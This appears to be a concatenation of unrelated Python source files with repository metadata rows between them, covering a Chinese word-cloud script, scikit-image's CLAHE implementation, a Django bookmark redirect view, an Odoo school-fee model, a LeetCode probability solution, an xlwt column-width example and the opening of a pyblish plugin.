    for k in range(len(commentList)):
        comments = comments + (str(commentList[k])).strip()
    # Keep only CJK characters; this drops punctuation and latin text.
    pattern = re.compile(r'[\u4e00-\u9fa5]+')
    filterdata = re.findall(pattern, comments)
    cleaned_comments = ''.join(filterdata)
    # Tokenize with jieba (Chinese word segmentation).
    segment = jieba.lcut(cleaned_comments)
    words_df=pd.DataFrame({'segment':segment})
    # Drop stop words loaded from disk.
    stopwords=pd.read_csv("stopwords.txt",index_col=False,quoting=3,sep="\t",names=['stopword'], encoding='utf-8')#quoting=3 means csv.QUOTE_NONE
    words_df=words_df[~words_df.segment.isin(stopwords.stopword)]
    # Word frequencies; the "计数" column name means "count".
    # NOTE(review): dict aggregation in groupby().agg() was deprecated and
    # later removed in pandas -- confirm the pinned pandas version.
    words_stat=words_df.groupby(by=['segment'])['segment'].agg({"计数":numpy.size})
    words_stat=words_stat.reset_index().sort_values(by=["计数"],ascending=False)
    # Render the 1000 most frequent words as a word cloud.
    wordcloud=WordCloud(font_path="simhei.ttf",background_color="white",max_font_size=80)
    word_frequence = {x[0]:x[1] for x in words_stat.head(1000).values}
    word_frequence_list = []
    for key in word_frequence:
        temp = (key,word_frequence[key])
        word_frequence_list.append(temp)
    # NOTE(review): newer wordcloud releases expect fit_words(dict); a list of
    # tuples only works on old versions -- confirm the installed release.
    wordcloud=wordcloud.fit_words(word_frequence_list)
    plt.imshow(wordcloud)
# Script entry point.
if __name__ == '__main__':
    main()
"Nainggolan@github.com"
] | Nainggolan@github.com |
c419b5f6c94fb876209a5e25dc5e3c375f29eb2e | 76a8ea60480331f0f61aeb61de55be9a6270e733 | /downloadable-site-packages/skimage/exposure/_adapthist.py | 0174274bc0147997bd63d884fa2589b3ee37c7de | [
"MIT"
] | permissive | bhagyas/Pyto | cd2ec3f35bec703db4ac29b56d17abc4bf03e375 | 907024a9b3e04a2a9de54976778c0e1a56b7b83c | refs/heads/master | 2022-11-19T13:05:07.392454 | 2020-07-21T17:33:39 | 2020-07-21T17:33:39 | 281,886,535 | 2 | 0 | MIT | 2020-07-23T07:48:03 | 2020-07-23T07:48:02 | null | UTF-8 | Python | false | false | 11,022 | py | """
Adapted code from "Contrast Limited Adaptive Histogram Equalization" by Karel
Zuiderveld <karel@cv.ruu.nl>, Graphics Gems IV, Academic Press, 1994.
http://tog.acm.org/resources/GraphicsGems/
The Graphics Gems code is copyright-protected. In other words, you cannot
claim the text of the code as your own and resell it. Using the code is
permitted in any program, product, or library, non-commercial or commercial.
Giving credit is not required, though is a nice gesture. The code comes as-is,
and if there are any flaws or problems with any Gems code, nobody involved with
Gems - authors, editors, publishers, or webmasters - are to be held
responsible. Basically, don't be a jerk, and remember that anything free
comes with no guarantee.
"""
import numbers
import numpy as np
from ..util import img_as_float, img_as_uint
from ..color.adapt_rgb import adapt_rgb, hsv_value
from ..exposure import rescale_intensity
NR_OF_GREY = 2 ** 14 # number of grayscale levels to use in CLAHE algorithm
@adapt_rgb(hsv_value)
def equalize_adapthist(image, kernel_size=None,
                       clip_limit=0.01, nbins=256):
    """Contrast Limited Adaptive Histogram Equalization (CLAHE).

    An algorithm for local contrast enhancement, that uses histograms computed
    over different tile regions of the image. Local details can therefore be
    enhanced even in regions that are darker or lighter than most of the image.

    Parameters
    ----------
    image : (M, N[, C]) ndarray
        Input image.
    kernel_size: integer or list-like, optional
        Defines the shape of contextual regions used in the algorithm. If
        iterable is passed, it must have the same number of elements as
        ``image.ndim`` (without color channel). If integer, it is broadcasted
        to each `image` dimension. By default, ``kernel_size`` is 1/8 of
        ``image`` height by 1/8 of its width.
    clip_limit : float, optional
        Clipping limit, normalized between 0 and 1 (higher values give more
        contrast).
    nbins : int, optional
        Number of gray bins for histogram ("data range").

    Returns
    -------
    out : (M, N[, C]) ndarray
        Equalized image.

    Raises
    ------
    ValueError
        If an iterable ``kernel_size`` does not match ``image.ndim``.

    See Also
    --------
    equalize_hist, rescale_intensity

    Notes
    -----
    * For color images, the following steps are performed:
       - The image is converted to HSV color space
       - The CLAHE algorithm is run on the V (Value) channel
       - The image is converted back to RGB space and returned
    * For RGBA images, the original alpha channel is removed.

    References
    ----------
    .. [1] http://tog.acm.org/resources/GraphicsGems/
    .. [2] https://en.wikipedia.org/wiki/CLAHE#CLAHE
    """
    image = img_as_uint(image)
    image = rescale_intensity(image, out_range=(0, NR_OF_GREY - 1))

    if kernel_size is None:
        kernel_size = (image.shape[0] // 8, image.shape[1] // 8)
    elif isinstance(kernel_size, numbers.Number):
        kernel_size = (kernel_size,) * image.ndim
    elif len(kernel_size) != image.ndim:
        # Bug fix: the exception was previously constructed but never raised,
        # so malformed kernel_size values were silently accepted.
        raise ValueError('Incorrect value of `kernel_size`: {}'.format(kernel_size))

    kernel_size = [int(k) for k in kernel_size]

    image = _clahe(image, kernel_size, clip_limit * nbins, nbins)
    image = img_as_float(image)
    return rescale_intensity(image)
def _clahe(image, kernel_size, clip_limit, nbins=128):
    """Contrast Limited Adaptive Histogram Equalization.

    Parameters
    ----------
    image : (M, N) ndarray
        Input image. Modified in place and also returned.
    kernel_size: 2-tuple of int
        Defines the shape of contextual regions used in the algorithm.
    clip_limit : float
        Normalized clipping limit (higher values give more contrast).
    nbins : int, optional
        Number of gray bins for histogram ("data range").

    Returns
    -------
    out : (M, N) ndarray
        Equalized image (the same array object as `image`).

    The number of "effective" greylevels in the output image is set by `nbins`;
    selecting a small value (eg. 128) speeds up processing and still produce
    an output image of good quality. The output image will have the same
    minimum and maximum value as the input image. A clip limit smaller than 1
    results in standard (non-contrast limited) AHE.
    """
    if clip_limit == 1.0:
        return image # is OK, immediately returns original image.

    # Number of contextual regions (tiles) per axis and their pixel size.
    nr = int(np.ceil(image.shape[0] / kernel_size[0]))
    nc = int(np.ceil(image.shape[1] / kernel_size[1]))
    row_step = int(np.floor(image.shape[0] / nr))
    col_step = int(np.floor(image.shape[1] / nc))

    # LUT mapping the NR_OF_GREY input levels down to `nbins` histogram bins.
    bin_size = 1 + NR_OF_GREY // nbins
    lut = np.arange(NR_OF_GREY)
    lut //= bin_size

    map_array = np.zeros((nr, nc, nbins), dtype=int)

    # Calculate greylevel mappings for each contextual region
    for r in range(nr):
        for c in range(nc):
            sub_img = image[r * row_step: (r + 1) * row_step,
                            c * col_step: (c + 1) * col_step]

            if clip_limit > 0.0: # Calculate actual cliplimit
                clim = int(clip_limit * sub_img.size / nbins)
                if clim < 1:
                    clim = 1
            else:
                clim = NR_OF_GREY # Large value, do not clip (AHE)

            hist = lut[sub_img.ravel()]
            hist = np.bincount(hist)
            # Pad so every tile's histogram has exactly `nbins` bins.
            hist = np.append(hist, np.zeros(nbins - hist.size, dtype=int))
            hist = clip_histogram(hist, clim)
            hist = map_histogram(hist, 0, NR_OF_GREY - 1, sub_img.size)
            map_array[r, c] = hist

    # Interpolate greylevel mappings to get CLAHE image
    rstart = 0
    for r in range(nr + 1):
        cstart = 0
        if r == 0: # special case: top row
            r_offset = row_step / 2.0
            rU = 0
            rB = 0
        elif r == nr: # special case: bottom row
            r_offset = row_step / 2.0
            rU = nr - 1
            rB = rU
        else: # default values
            r_offset = row_step
            rU = r - 1
            # Relies on rB from the previous iteration; equivalent to rU + 1.
            rB = rB + 1

        for c in range(nc + 1):
            if c == 0: # special case: left column
                c_offset = col_step / 2.0
                cL = 0
                cR = 0
            elif c == nc: # special case: right column
                c_offset = col_step / 2.0
                cL = nc - 1
                cR = cL
            else: # default values
                c_offset = col_step
                cL = c - 1
                cR = cL + 1

            # The four tile mappings surrounding this interpolation window.
            mapLU = map_array[rU, cL]
            mapRU = map_array[rU, cR]
            mapLB = map_array[rB, cL]
            mapRB = map_array[rB, cR]

            cslice = np.arange(cstart, cstart + c_offset)
            rslice = np.arange(rstart, rstart + r_offset)

            # interpolate() writes the equalized values into `image` in place.
            interpolate(image, cslice, rslice,
                        mapLU, mapRU, mapLB, mapRB, lut)

            cstart += c_offset # set pointer on next matrix */

        rstart += r_offset

    return image
def clip_histogram(hist, clip_limit):
    """Clip *hist* at *clip_limit* and redistribute the excess counts.

    Every bin above ``clip_limit`` is clamped, and the clipped-off counts
    are spread as evenly as possible over the remaining bins (never pushing
    a bin past the limit). The array is modified in place.

    Parameters
    ----------
    hist : ndarray
        Histogram array (modified in place).
    clip_limit : int
        Maximum allowed bin count.

    Returns
    -------
    hist : ndarray
        Clipped histogram (same object as the input).
    """
    # Total number of counts sitting above the limit.
    over_limit = hist > clip_limit
    clipped_off = hist[over_limit]
    n_excess = clipped_off.sum() - clipped_off.size * clip_limit

    # Clamp the tall bins, then hand every bin safely below the limit an
    # equal share of the excess.
    per_bin = int(n_excess / hist.size)
    safe_ceiling = clip_limit - per_bin
    hist[over_limit] = clip_limit

    below_ceiling = hist < safe_ceiling
    n_excess -= hist[below_ceiling].size * per_bin
    hist[below_ceiling] += per_bin

    # Bins between the ceiling and the limit are topped up to the limit.
    near_limit = (hist >= safe_ceiling) & (hist < clip_limit)
    topped = hist[near_limit]
    n_excess -= topped.size * clip_limit - topped.sum()
    hist[near_limit] = clip_limit

    previous = n_excess
    while n_excess > 0: # hand out whatever is left, one count at a time
        start = 0
        while n_excess > 0 and start < hist.size:
            candidates = hist < 0
            stride = int(hist[hist < clip_limit].size / n_excess)
            stride = max(stride, 1)
            positions = np.arange(start, hist.size, stride)
            candidates[positions] = True
            candidates = (candidates) & (hist < clip_limit)
            hist[candidates] += 1
            n_excess -= candidates.sum()
            start += 1
        # Bail out if a full pass distributed nothing.
        if previous == n_excess:
            break
        previous = n_excess

    return hist
def map_histogram(hist, min_val, max_val, n_pixels):
    """Build the equalization lookup table for one clipped histogram.

    The cumulative histogram is rescaled so that it spans
    ``[min_val, max_val]`` for a region of ``n_pixels`` pixels.

    Parameters
    ----------
    hist : ndarray
        Clipped histogram.
    min_val : int
        Minimum value for mapping.
    max_val : int
        Maximum value for mapping.
    n_pixels : int
        Number of pixels in the region.

    Returns
    -------
    out : ndarray
        Mapped intensity LUT (integer valued, clamped at ``max_val``).
    """
    lut = np.cumsum(hist).astype(float)
    lut *= float(max_val - min_val) / n_pixels
    lut += min_val
    lut = np.minimum(lut, max_val)
    return lut.astype(int)
def interpolate(image, xslice, yslice,
                mapLU, mapRU, mapLB, mapRB, lut):
    """Find the new grayscale level for a region using bilinear interpolation.

    Parameters
    ----------
    image : ndarray
        Full image. The addressed subregion is overwritten in place.
    xslice, yslice : array-like
        Indices of the region.
    map* : ndarray
        Mappings of greylevels from histograms of the four surrounding tiles
        (L/R = left/right, U/B = upper/bottom).
    lut : ndarray
        Maps grayscale levels in image to histogram levels.

    Returns
    -------
    out : ndarray
        Original image with the subregion replaced (same object as `image`).

    Notes
    -----
    This function calculates the new greylevel assignments of pixels within
    a submatrix of the image. This is done by a bilinear interpolation between
    four different mappings in order to eliminate boundary artifacts.
    """
    norm = xslice.size * yslice.size # Normalization factor
    # interpolation weight matrices (direct weights grow with the index,
    # inverse weights shrink; together they always sum to norm per pixel)
    x_coef, y_coef = np.meshgrid(np.arange(xslice.size),
                                 np.arange(yslice.size))
    x_inv_coef, y_inv_coef = x_coef[:, ::-1] + 1, y_coef[::-1] + 1
    # A writable view into the region; assigning to it updates `image`.
    view = image[int(yslice[0]):int(yslice[-1] + 1),
                 int(xslice[0]):int(xslice[-1] + 1)]
    im_slice = lut[view]
    new = ((y_inv_coef * (x_inv_coef * mapLU[im_slice]
                          + x_coef * mapRU[im_slice])
            + y_coef * (x_inv_coef * mapLB[im_slice]
                        + x_coef * mapRB[im_slice]))
           / norm)
    view[:, :] = new
    return image
| [
"adrilabbelol@gmail.com"
] | adrilabbelol@gmail.com |
8d4ab8697bc69c095b7c8d6b18ed034aff53b586 | 85b3c686db76bce624a262de20ffb0b882840fdd | /social_bookmarking/views.py | a8de490964067340914be4d7af222a0ca1033d5f | [
"MIT"
] | permissive | truongsinh/django-social-media | 6361413a80bac6e3827dd725cca95db1c82a2974 | 90f51d97409d87b598386f2ca82e6e3168478d32 | refs/heads/master | 2020-12-25T11:53:21.394434 | 2011-02-19T08:47:08 | 2011-02-19T08:47:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,134 | py | from django.shortcuts import get_object_or_404, redirect
from django.http import Http404
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ObjectDoesNotExist
from social_bookmarking.models import BookmarkRelated, Bookmark
def bookmark_referer(request, slug, content_type, object_pk, url):
    """
    Redirect to `url` after validating the bookmark and its related object.

    The bookmark is looked up by slug and the target object by
    ``content_type`` (``"app.model"``) and primary key; Http404 is raised
    when either cannot be resolved. On success the related-bookmark visit
    counter is incremented before redirecting.
    """
    bookmark = get_object_or_404(Bookmark, slug=slug)
    app_label, model_name = content_type.split('.')
    try:
        ctype = ContentType.objects.get(app_label=app_label, model=model_name)
        target = ctype.get_object_for_this_type(pk=object_pk)
    except ObjectDoesNotExist:
        raise Http404
    related, _created = BookmarkRelated.objects.get_or_create(
        content_type=ctype,
        object_id=target.pk,
        bookmark=bookmark,
    )
    related.visits += 1
    related.save()
    return redirect(url)
return redirect(url) | [
"florent.messa@gmail.com"
] | florent.messa@gmail.com |
f6797ec80344efdb57b3bf0cc450d5e008058142 | df7f13ec34591fe1ce2d9aeebd5fd183e012711a | /hata/discord/guild/guild_join_request_delete_event/tests/test__parse_guild_id.py | d0a4cde74f5380fcf06b03c4fad8746b6745a2a9 | [
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | HuyaneMatsu/hata | 63e2f6a2d7a7539fd8f18498852d9d3fe5c41d2e | 53f24fdb38459dc5a4fd04f11bdbfee8295b76a4 | refs/heads/master | 2023-08-20T15:58:09.343044 | 2023-08-20T13:09:03 | 2023-08-20T13:09:03 | 163,677,173 | 3 | 3 | Apache-2.0 | 2019-12-18T03:46:12 | 2018-12-31T14:59:47 | Python | UTF-8 | Python | false | false | 600 | py | import vampytest
from ..fields import parse_guild_id
def _iter_options():
guild_id = 202305160007
yield {}, 0
yield {'guild_id': None}, 0
yield {'guild_id': str(guild_id)}, guild_id
@vampytest._(vampytest.call_from(_iter_options()).returning_last())
def test__parse_guild_id(input_data):
    """
    Tests whether ``parse_guild_id`` works as intended.

    Parametrised by ``_iter_options`` (missing key, explicit ``None`` and a
    stringified snowflake).

    Parameters
    ----------
    input_data : `dict<str, object>`
        Data to try to parse the guild identifier from.

    Returns
    -------
    output : `int`
        The parsed guild identifier, ``0`` when absent.
    """
    return parse_guild_id(input_data)
| [
"re.ism.tm@gmail.com"
] | re.ism.tm@gmail.com |
0343aa919475892c10a18e355ebc64fa364d40a9 | cd872ab5bce8dd111952af4721c5f270e7236344 | /edsys_fee_enhancement/model/registration.py | ce2846a5939273dc262601522627dd22d68ad655 | [] | no_license | probytesodoo/edsys_school_erp | 26e2dd24d907bf76be00ac17872d84ae3a5fdf7e | 0e65e5d937b029beb69563772197b9b050748407 | refs/heads/master | 2020-04-15T22:21:02.623926 | 2019-03-12T13:47:03 | 2019-03-12T13:47:03 | 165,069,627 | 1 | 2 | null | 2019-01-16T09:41:01 | 2019-01-10T14:00:36 | Python | UTF-8 | Python | false | false | 14,490 | py | from odoo import models, fields, api, _
import datetime
from odoo.exceptions import except_orm
import base64
class Registration(models.Model):
    """Extension of ``registration`` adding discount-date validation and
    per-registration fee computation (old Odoo API, Python 2 era)."""
    _inherit = 'registration'

    # Date from which a discount applies; must fall within the batch's
    # academic year (validated in write()).
    discount_applicable_date = fields.Date('Discount Applicable Date')
    fee_computation_ids = fields.One2many('fee.computation', 'registration_id', 'Fee Computation')

    @api.multi
    def write(self, vals):
        """Validate ``discount_applicable_date`` against the batch's academic
        year before delegating to the standard ``write``.

        :raises except_orm: when the date lies outside the academic year.
        """
        if 'discount_applicable_date' in vals and vals['discount_applicable_date']:
            discount_applicable_date_formatted = datetime.datetime.strptime(vals['discount_applicable_date'], "%Y-%m-%d").date()
            acd_yr_start_date = self.batch_id.start_date
            acd_yr_end_date = self.batch_id.end_date
            acd_yr_start_date_formatted = datetime.datetime.strptime(acd_yr_start_date, "%Y-%m-%d").date()
            acd_yr_end_date_formatted = datetime.datetime.strptime(acd_yr_end_date, "%Y-%m-%d").date()
            # Bug fix: the original condition used `and`, which can never be
            # True (a date cannot be both before the start and after the end),
            # so this validation silently never fired.
            if discount_applicable_date_formatted < acd_yr_start_date_formatted or discount_applicable_date_formatted > acd_yr_end_date_formatted:
                raise except_orm(_('Warning!'), _("Discount Applicable Date should between academic year start date and end date "))
        return super(Registration, self).write(vals)

    @api.multi
    def generate_payable_fee_recs(self, flag):
        """Create ``student.payble.fee`` records for the student's current fee
        computation, one per fee line that does not already exist for the same
        month / fee / payment type. Existing lines are left untouched.

        :param flag: kept for interface compatibility; not used here.
        :raises except_orm: when the fee structure is unconfirmed, a fee line
            lacks an income account, the fee computation is missing, or the
            registration has no student.
        """
        if self.fee_structure_confirm != True:
            raise except_orm(_("Warning!"), _('Please Confirm the fee structure before paying fee'))
        stud_payble_obj = self.env['student.payble.fee']
        if self.student_id:
            stud_payble_val = {}
            if self.fee_computation_ids:
                for fee_computation_line_rec in self.fee_computation_ids[0].fee_computation_line_ids:
                    if not fee_computation_line_rec.name.property_account_income_id.id:
                        raise except_orm(_("Warning!"), _('Please define property income account for fees %s') % fee_computation_line_rec.name.name)
                    # De-duplicate: skip lines already materialised for this
                    # student / month / fee / payment type.
                    stud_payble_rec = stud_payble_obj.search_count([('month_id', '=', self.fee_computation_ids[0].month_id.id),
                                                                    ('name', '=', fee_computation_line_rec.name.id),
                                                                    ('fee_pay_type', '=', fee_computation_line_rec.fee_payment_type_id.id),
                                                                    ('student_id', '=', self.student_id.id)])
                    if stud_payble_rec == 0:
                        stud_payble_val = {
                            'name': fee_computation_line_rec.name.id,
                            'student_id': self.student_id.id,
                            'month_id': self.fee_computation_ids[0].month_id.id,
                            'fee_pay_type': fee_computation_line_rec.fee_payment_type_id.id,
                            'cal_amount': 0,
                            'total_amount': fee_computation_line_rec.payable_amount,
                            'discount_amount': 0,
                        }
                        stud_payble_obj.create(stud_payble_val)
            else:
                raise except_orm(_("Warning!"), _('Fee computation does not exists'))
        else:
            raise except_orm(_("Warning!"), _('Student Not Found'))

    @api.multi
    def send_payfort_acd_for_next_year_computation(self):
        """Build (or refresh) the Next Year Advance Fee record for this
        registration from the student's fee computation.

        Fee lines become positive NYAF lines; discounts become negative,
        priority-0 lines on the student's advance-payment account.

        :return: the matching or newly created ``next.year.advance.fee``
            recordset.
        :raises except_orm: when the advance account or a discount fee /
            income account is missing.
        """
        next_year_advance_fee_obj = self.env['next.year.advance.fee']
        sequence = 1
        next_year_advance_fee_line_data = []
        if not self.student_id.property_account_customer_advance.id:
            raise except_orm(_('Warning!'),
                             _("Please define student Advance Payment Account!"))
        for fee_computation_line_rec in self.student_id.fee_computation_ids[0].fee_computation_line_ids:
            next_year_advance_fee_line_data.append((0, 0, {
                'name': fee_computation_line_rec.name.id,
                'description': fee_computation_line_rec.name.name,
                'account_id': self.student_id.property_account_customer_advance.id,
                'priority': sequence,
                'amount': fee_computation_line_rec.calculated_amount,
                'rem_amount': fee_computation_line_rec.calculated_amount,
            }))
            sequence += 1
            if fee_computation_line_rec.discount_percentage > 0.00 or fee_computation_line_rec.discount_amount > 0.00:
                if not fee_computation_line_rec.name.fees_discount:
                    raise except_orm(_("Warning!"), _('Please define Discount Fees for %s.') % (fee_computation_line_rec.name.name))
                else:
                    if not fee_computation_line_rec.name.fees_discount.property_account_income.id:
                        raise except_orm(_("Warning!"), _('Please define account Income for %s.') % (fee_computation_line_rec.name.fees_discount.name))
                    else:
                        # Negative line representing the discount.
                        next_year_advance_fee_line_data.append((0, 0, {
                            'name': fee_computation_line_rec.name.fees_discount.id,
                            'description': fee_computation_line_rec.name.fees_discount.name,
                            'account_id': self.student_id.property_account_customer_advance.id,
                            'priority': 0,
                            'amount': -(fee_computation_line_rec.discount_amount),
                            'rem_amount': -(fee_computation_line_rec.discount_amount),
                        }))
        # check if NYAF already exists... if yes then update else create new
        next_year_advance_fee_id = next_year_advance_fee_obj.search([('partner_id', '=', self.student_id.id), ('reg_id', '=', self.id), ('batch_id', '=', self.batch_id.id), ('state', 'in', ('fee_unpaid', 'fee_partial_paid', 'fee_paid'))])
        if next_year_advance_fee_id:
            for next_year_advance_fee_line_id in next_year_advance_fee_id.next_year_advance_fee_line_ids:
                if next_year_advance_fee_line_id.amount < 0:
                    # Old discount lines are dropped and re-added below.
                    next_year_advance_fee_line_id.unlink()
                else:
                    for next_year_advance_fee_line in next_year_advance_fee_line_data:
                        if next_year_advance_fee_line_id.name.id == next_year_advance_fee_line[2]['name']:
                            next_year_advance_fee_line_id.amount = next_year_advance_fee_line[2]['amount']
                            next_year_advance_fee_line_id.rem_amount = next_year_advance_fee_line[2]['rem_amount']
            for next_year_advance_fee_line in next_year_advance_fee_line_data:
                if next_year_advance_fee_line[2]['amount'] < 0:
                    next_year_advance_fee_id.write({'next_year_advance_fee_line_ids': [next_year_advance_fee_line]})
            return next_year_advance_fee_id
        else:
            next_year_advance_fee_data = {
                'partner_id': self.student_id.id,
                'reg_id': self.id,
                'enq_date': self.application_date,
                'order_id': '/',
                'batch_id': self.batch_id.id,
                'state': 'fee_unpaid',
                'next_year_advance_fee_line_ids': next_year_advance_fee_line_data,
            }
            new_obj = next_year_advance_fee_obj.create(next_year_advance_fee_data)
            return new_obj

    @api.multi
    def send_payfort_acd_pay_link_computation(self):
        """Prepare data for an online academy-fee payment link and create the
        payable fee records.

        Picks the order reference / outstanding amount from the invoice, the
        existing NYAF, or a freshly created NYAF (non-current academic year).
        """
        amount_on_link = 0.00
        if self._context.has_key('flag') and self._context.get('flag') == True:
            if self.fee_structure_confirm != True:
                raise except_orm(_("Warning!"), _('Please Confirm the fee structure before sending payment link.'))
        if self.invoice_id:
            order_id = self.invoice_id.invoice_number
            amount_on_link = self.invoice_id.residual
        elif self.next_year_advance_fee_id:
            order_id = self.next_year_advance_fee_id.order_id
            amount_on_link = self.next_year_advance_fee_id.residual
        else:
            if self.batch_id.current_academic != True:
                # create NYAF if not current academic year
                get_record = self.send_payfort_acd_for_next_year_computation()
                self.next_year_advance_fee_id = get_record.id
                order_id = get_record.order_id
        # NOTE(review): order_id / amount_on_link are computed but never used
        # below -- the actual link-sending step appears to have been removed
        # or truncated; confirm against the original edsys_edu module.
        # generate payble fee records
        payable_fee_recs = self.generate_payable_fee_recs(True)

    @api.multi
    def compute_fee_structure(self):
        """Rebuild the student's fee computation and mirror it onto this
        registration's ``fee_computation_ids``."""
        fee_computation_obj = self.env['fee.computation']
        # Remove previous fee computation lines from the student.
        if self.student_id.fee_computation_ids:
            for fee_computation_rec in self.student_id.fee_computation_ids:
                fee_computation_rec.unlink()
        # Create new fee computation lines on the student.
        self.student_id.update_fee_structure()
        # Copy the same lines onto the registration's fee computation.
        if self.student_id.fee_computation_ids:
            for fee_computation_rec in self.student_id.fee_computation_ids:
                fee_computation_line_ids = []
                for fee_computation_line_rec in fee_computation_rec.fee_computation_line_ids:
                    fee_computation_line_vals = {
                        'name': fee_computation_line_rec.name.id,
                        'calculated_amount': fee_computation_line_rec.calculated_amount,
                        'discount_percentage': fee_computation_line_rec.discount_percentage,
                        'discount_amount': round(fee_computation_line_rec.discount_amount),
                        'payable_amount': round(fee_computation_line_rec.payable_amount),
                        'fee_payment_type_id': fee_computation_line_rec.fee_payment_type_id.id,
                    }
                    fee_computation_line_ids.append((0, 0, fee_computation_line_vals))
                fee_computation_vals = {
                    'month_id': fee_computation_rec.month_id.id,
                    'fee_date': fee_computation_rec.fee_date,
                    'fee_computation_line_ids': fee_computation_line_ids,
                    'total_calculated_amount': fee_computation_rec.total_calculated_amount,
                    'total_discount_amount': fee_computation_rec.total_discount_amount,
                    'invoice_amount': fee_computation_rec.invoice_amount,
                    'discount_category_id': fee_computation_rec.discount_category_id.id,
                    'status': fee_computation_rec.status,
                    'registration_id': self.id,
                }
                fee_computation_obj.create(fee_computation_vals)

    @api.multi
    def confirm_done_fee_structure_computation(self):
        """Recompute the fee structure, confirm it, send the payment link and
        the extra-form mail, and record the confirmation timestamps."""
        self.compute_fee_structure()
        ###### Start : from confirm_done_fee_structure of edsys_edu/models/registration
        self.fee_structure_confirm = True
        # send mail for link to pay acd fee online
        self.send_payfort_acd_pay_link_computation()
        self.current_date_for_link = base64.b64encode(str(datetime.date.today()))
        # send mail for extra form fillup and genarate link for same,
        self.send_mail_for_extra_form_fillup()
        dumy_date = base64.b64encode('0000-00-00')
        self.remaining_form_link = '/student/verification?ENQUIRY=%s&DATE=%s'%(self.enquiry_no,dumy_date)
        self.confirm_fee_date = datetime.datetime.now()
        ###### End : from confirm_done_fee_structure of edsys_edu/models/registration

    @api.multi
    def confirm_fee_structure(self):
        """Drop stale fee computations on both the student and the
        registration, confirm via the parent method, then propagate the
        discount applicable date to the student."""
        if self.student_id.fee_computation_ids:
            # remove previous years fee computation lines
            for fee_computation_rec in self.student_id.fee_computation_ids:
                fee_computation_rec.unlink()
        if self.fee_computation_ids:
            # remove previous years fee computation lines from registration
            for fee_computation_rec in self.fee_computation_ids:
                fee_computation_rec.unlink()
        res = super(Registration, self).confirm_fee_structure()
        if self.discount_applicable_date:
            discount_applicable_date_formatted = datetime.datetime.strptime(self.discount_applicable_date, "%Y-%m-%d").date()
            self.student_id.discount_applicable_date = discount_applicable_date_formatted
        # Bug fix: the parent's result was previously discarded; return it so
        # callers receive any action/flag the parent method produces.
        return res
| [
"redbytes.test@gmail.com"
] | redbytes.test@gmail.com |
f99658226c6f0dbf526e4279f61ca16cfd909486 | 942ee5e8d54e8ebe9c5c841fbfdd1da652946944 | /1001-1500/1467.Probability of a Two Boxes Having The Same Number of Distinct Balls.py | 5e7f9b3fd1966c2ca99755119191d27b2d196478 | [] | no_license | kaiwensun/leetcode | 0129c174457f32887fbca078fb448adce46dd89d | 6b607f4aae3a4603e61f2e2b7480fdfba1d9b947 | refs/heads/master | 2023-08-31T07:30:50.459062 | 2023-08-27T07:59:16 | 2023-08-27T07:59:16 | 57,526,914 | 69 | 9 | null | 2023-08-20T06:34:41 | 2016-05-01T05:37:29 | Python | UTF-8 | Python | false | false | 1,431 | py | import functools, collections
class Solution:
    """LeetCode 1467: probability that two boxes of ``2n`` uniformly shuffled
    balls end up holding the same number of *distinct* colors each."""

    def getProbability(self, balls: list[int]) -> float:
        """Return the probability that both boxes hold equally many distinct colors.

        ``balls[i]`` is the count of balls of color ``i``; ``sum(balls)`` is
        even, the first half of a random shuffle fills box 1 and the second
        half fills box 2.

        Fixes: the original annotated the parameter as ``List[int]`` without
        importing ``List`` (NameError at class-definition time in this file)
        and sized a hand-rolled factorial table as ``max(balls) + 1 + 100``;
        ``math.comb`` removes both issues.
        """
        from math import comb

        box_size = sum(balls) // 2

        def search(color, space_l, space_r, uniq_l, uniq_r):
            # Returns (#arrangements with equal distinct counts, #arrangements)
            # over all ways of splitting colors[color:] into the remaining
            # slots of each box, weighted by the number of orderings.
            if color == len(balls):
                # All balls placed, so both remaining spaces are 0 here.
                return (1, 1) if uniq_l == uniq_r else (0, 1)
            cnt_uniq = cnt_total = 0
            for left in range(balls[color] + 1):
                right = balls[color] - left
                if left > space_l or right > space_r:
                    continue
                sub_uniq, sub_total = search(
                    color + 1,
                    space_l - left,
                    space_r - right,
                    uniq_l + (left > 0),
                    uniq_r + (right > 0),
                )
                # Ways to interleave this color's balls into each box's slots.
                weight = comb(space_l, left) * comb(space_r, right)
                cnt_uniq += sub_uniq * weight
                cnt_total += sub_total * weight
            return cnt_uniq, cnt_total

        good, total = search(0, box_size, box_size, 0, 0)
        return good / total
| [
"noreply@github.com"
] | kaiwensun.noreply@github.com |
4258a6ba19ea4d7cf50cab6bbeb0bd1e93cb00b0 | 1860aa3e5c0ba832d6dd12bb9af43a9f7092378d | /modules/xlwt3-0.1.2/examples/col_width.py | 90d82eb9415a897615d41007b926e35096306e1a | [
"BSD-2-Clause",
"BSD-3-Clause"
] | permissive | agz1990/GitPython | d90de16451fab9222851af790b67bcccdf35ab75 | 951be21fbf8477bad7d62423b72c3bc87154357b | refs/heads/master | 2020-08-06T18:12:26.459541 | 2015-07-05T14:58:57 | 2015-07-05T14:58:57 | 12,617,111 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | #!/usr/bin/env python
# -*- coding: windows-1251 -*-
# Copyright (C) 2005 Kiseliov Roman
from xlwt3 import *
# Build a sheet demonstrating per-column widths alongside growing font sizes.
w = Workbook()
ws = w.add_sheet('Hey, Dude')

for i in range(6, 80):
    fnt = Font()
    fnt.height = i * 20            # font height in twips (1/20 pt)
    style = XFStyle()
    style.font = fnt
    # Bug fix: the style was built each iteration but never used; pass it to
    # write() so the demo actually shows the growing font.
    ws.write(1, i, 'Test', style)
    ws.col(i).width = 0x0d00 + i   # widths in 1/256 of the '0' character width

w.save('col_width.xls')
| [
"522360568@qq.com"
] | 522360568@qq.com |
723c1499308ef1947356732e42ee5c9030771c94 | 20c80f722c451b64d05cc027b66a81e1976c3253 | /commons/libs/pyblish_starter/plugins/integrate_asset.py | 4dd833f1be3f9c0d61e553108a7956a38094f954 | [] | no_license | flypotatojun/Barbarian | 2d3fcb6fcb1b4495b6d62fc5e32634abf4638312 | efe14dd24c65b4852997dad1290e503211bcc419 | refs/heads/master | 2021-07-18T01:43:14.443911 | 2017-10-24T03:37:43 | 2017-10-24T03:37:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,421 | py | import pyblish.api
class IntegrateStarterAsset(pyblish.api.InstancePlugin):
"""Move user data to shared location
This plug-in exposes your data to others by encapsulating it
into a new version.
Schema:
Data is written in the following format.
____________________
| |
| version |
| ________________ |
| | | |
| | representation | |
